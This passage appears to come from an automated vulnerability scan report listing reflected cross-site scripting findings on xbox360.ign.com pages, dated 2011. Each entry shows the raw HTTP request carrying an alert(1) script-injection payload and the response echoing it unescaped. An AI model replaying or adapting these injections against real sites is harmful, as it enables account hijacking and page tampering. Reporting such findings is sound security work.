<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
== 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/latest-updates.html?types=allb4bfc"-alert(1)-"d38b6af0468",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.416. http://xbox360.ign.com/index/latest-updates.html [types parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/latest-updates.html

Issue detail

The value of the types request parameter is copied into an HTML comment. The payload 9b745--><script>alert(1)</script>7f0a23e5ff1 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index/latest-updates.html?types=all9b745--><script>alert(1)</script>7f0a23e5ff1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:23:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763382784v-111n-12mc+1317763382784mv+111mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 132017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>alert(1)</script>7f0a23e5ff1&startDate=20110904&endDate=20111004 -->
...[SNIP]...

1.417. http://xbox360.ign.com/index/latest-updates.html [types parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/latest-updates.html

Issue detail

The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65d8"><script>alert(1)</script>f584b5157c was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?types=allf65d8"><script>alert(1)</script>f584b5157c HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763376113v-92n-12mc+1317763376113mv+92mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/latest-updates.html?types=allf65d8"><script>alert(1)</script>f584b5157c&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.418. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cde2"-alert(1)-"a84cf1bf9c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/news.html?8cde2"-alert(1)-"a84cf1bf9c3=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763369619v-76n-12mc+1317763369620mv+76mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Xbox 360: Game
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/news.html?8cde2"-alert(1)-"a84cf1bf9c3=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.419. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11209"><script>alert(1)</script>a0efc3dfd9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/news.html?11209"><script>alert(1)</script>a0efc3dfd9b=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366669v-71n-12mc+1317763366669mv+71mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>IGN Xbox 360: Game
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/news.html?11209"><script>alert(1)</script>a0efc3dfd9b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.420. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c90"-alert(1)-"0642bf4d675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/previews.html?51c90"-alert(1)-"0642bf4d675=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366816v-71n-12mc+1317763366816mv+71mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Xbox 360: Game
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/previews.html?51c90"-alert(1)-"0642bf4d675=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.421. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b798"><script>alert(1)</script>53870f6b7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/previews.html?2b798"><script>alert(1)</script>53870f6b7a=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:46 GMT
Content-Length: 11347
Connection: close
Set-Cookie: freq=c-1317763366669v-67n-12mc+1317763366669mv+67mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<a href="http://xbox360.ign.com/index/previews.html?2b798"><script>alert(1)</script>53870f6b7a=1" class="prestitialText2">
...[SNIP]...

1.422. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8cd5"-alert(1)-"717660b84fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/reviews.html?f8cd5"-alert(1)-"717660b84fe=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-78n-12mc+1317763370104mv+78mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 186036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Xbox 360 Revie
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/reviews.html?f8cd5"-alert(1)-"717660b84fe=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.423. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25cc1"><script>alert(1)</script>83a3b5e0ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?25cc1"><script>alert(1)</script>83a3b5e0ef3=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370251v-74n-12mc+1317763370251mv+74mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 185854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>New Xbox 360 Revie
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/reviews.html?25cc1"><script>alert(1)</script>83a3b5e0ef3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.424. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/top-reviewed.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19068"-alert(1)-"e93224a4964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/top-reviewed.html?19068"-alert(1)-"e93224a4964=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366669v-69n-12mc+1317763366669mv+69mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 188625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Xbox 360 Reviews,
...[SNIP]...
mscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/top-reviewed.html?19068"-alert(1)-"e93224a4964=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.425. http://xbox360.ign.com/index/top-reviewed.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/top-reviewed.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c6f"><script>alert(1)</script>9c35dfe9a3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/top-reviewed.html?a7c6f"><script>alert(1)</script>9c35dfe9a3b=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763364567v-62n-12mc+1317763364567mv+62mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 182645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Xbox 360 Reviews,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/top-reviewed.html?a7c6f"><script>alert(1)</script>9c35dfe9a3b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.426. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c99"><script>alert(1)</script>d8303cab3bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/upcoming.html?96c99"><script>alert(1)</script>d8303cab3bf=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763364553v-65n-12mc+1317763364553mv+65mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 179086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>New Xbox 360 Games
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/upcoming.html?96c99"><script>alert(1)</script>d8303cab3bf=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.427. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d5aa"-alert(1)-"8846be92dfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/upcoming.html?3d5aa"-alert(1)-"8846be92dfb=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366781v-70n-12mc+1317763366781mv+70mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 179027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Xbox 360 Games
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/upcoming.html?3d5aa"-alert(1)-"8846be92dfb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.428. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f42"><script>alert(1)</script>55e69437464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/videos.html?39f42"><script>alert(1)</script>55e69437464=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763367174v-69n-12mc+1317763367174mv+69mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 134462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>IGN Xbox 360: Game
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/videos.html?39f42"><script>alert(1)</script>55e69437464=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.429. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc960"-alert(1)-"848701e55cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/videos.html?cc960"-alert(1)-"848701e55cb=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370137v-75n-12mc+1317763370137mv+75mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 122633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Xbox 360: Game
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/videos.html?cc960"-alert(1)-"848701e55cb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.430. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/objects/082/082318.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b718a"><script>alert(1)</script>7d1730acf99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/082/082318.html?b718a"><script>alert(1)</script>7d1730acf99=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 116906
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317763378039v-98n-12mc+1317763378039mv+98mn+12wwe~0;Path=/;Domain=.ign.com
Expires: Tue, 04 Oct 2011 21:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/objects/082/082318.html?b718a"><script>alert(1)</script>7d1730acf99=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.431. http://xbox360.ign.com/objects/082/082318.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/objects/082/082318.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3823"-alert(1)-"8bf0bcc2a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /objects/082/082318.html?b3823"-alert(1)-"8bf0bcc2a58=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 11351
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317763381183v-103n-12mc+1317763381183mv+103mn+12wwe~0;Path=/;Domain=.ign.com
Expires: Tue, 04 Oct 2011 21:23:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:01 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
) {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://xbox360.ign.com/objects/082/082318.html?b3823"-alert(1)-"8bf0bcc2a58=1";
return true;

   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.432. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/objects/926/926417.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b44"-alert(1)-"6ad9b13b29e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

